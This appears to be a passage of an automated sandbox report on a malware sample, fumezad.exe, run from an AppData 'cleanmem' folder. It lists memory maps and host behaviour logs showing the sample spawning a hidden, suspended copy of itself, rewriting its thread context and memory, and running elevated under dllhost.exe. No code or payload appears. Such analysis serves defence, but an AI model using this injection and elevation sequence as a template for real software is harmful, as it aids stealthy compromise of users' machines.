| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00190000 | 0x00193fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x001b0000 | 0x001cffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00220000 | 0x00223fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00407fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00410000 | 0x0043ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00446fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00650fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0069ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007a1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x008a0000 | 0x00b6efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c7ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x00cc0000 | 0x00cc4fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x020cffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x0210ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0219ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002210000 | 0x02210000 | 0x022eefff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x022f0000 | 0x02355fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x024affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000024b0000 | 0x024b0000 | 0x028a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| shdocvw.dll | 0x74790000 | 0x747bdfff | Memory Mapped File | rwx |
|
|
|
- |
| cmlua.dll | 0x747c0000 | 0x747cbfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x749b0000 | 0x749bdfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x749c0000 | 0x749fafff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x74a00000 | 0x74a0dfff | Memory Mapped File | rwx |
|
|
|
- |
| cmstplua.dll | 0x74a10000 | 0x74a17fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74a20000 | 0x74a28fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74a30000 | 0x74a7bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74a80000 | 0x74aa0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74ab0000 | 0x74ba4fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74bb0000 | 0x74bc5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74bd0000 | 0x74d6dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74d70000 | 0x74d7afff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75050000 | 0x750cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75520000 | 0x75531fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75740000 | 0x75875fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x759e0000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x75a10000 | 0x75b04fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75b10000 | 0x75b54fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75d70000 | 0x75f0cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75f10000 | 0x7610afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x762c0000 | 0x762e6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76650000 | 0x7676cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Process #15: fumezad.exe
290
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:08, Reason: Self Terminated |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x240 |
| Parent PID | 0x5d4 (c:\windows\syswow64\dllhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
138
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002d4fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| fumezad.exe | 0x00400000 | 0x00479fff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00480000 | 0x004e6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00677fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01c38fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01d7bfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c40000 | 0x01c40000 | 0x01c6afff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01dabfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01f2ffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (21)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | C:\Windows\SysWOW64\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
4 | |
| Get Info | C:\Windows\SysWOW64\ntdll.dll | type = size |
|
3 | |
| Get Info | C:\Windows\SysWOW64\ntdll.dll | type = size |
|
4 | |
| Read | C:\Windows\SysWOW64\ntdll.dll | size = 1292096, size_out = 1292096 |
|
3 | |
| Read | C:\Windows\SysWOW64\ntdll.dll | size = 1292096, size_out = 1292096 |
|
4 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | os_pid = 0x844, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0x138 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0x138 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0x138 |
|
1 |
Memory (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | address = 0x7efde008, size = 4 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | address = 0x7efde008, size = 4 |
|
1 |
Module (9)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 259 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x76551856 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x76557a10 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1576436 |
|
1 | |
| Map | - | process_name = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c40000 |
|
1 |
System (251)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:06 (UTC) |
|
250 | |
| Get Time | type = Ticks, time = 166187 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #16: fumezad.exe
75
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x844 |
| Parent PID | 0x240 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
854
0x
864
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00360fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f3fff | Private Memory | rwx |
|
|
|
- |
| fumezad.exe | 0x00400000 | 0x00479fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x0042afff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005ddfff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00880fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x008a9fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00892fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00890fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x01cdffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ce0000 | 0x01ce0000 | 0x020effff | Pagefile Backed Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ce0000 | 0x01faefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001fb0000 | 0x01fb0000 | 0x023bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| kernelbase.dll | 0x01fb0000 | 0x0201afff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000020f0000 | 0x020f0000 | 0x024fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x027cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000010000000 | 0x10000000 | 0x10006fff | Private Memory | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74e90000 | 0x74e9cfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
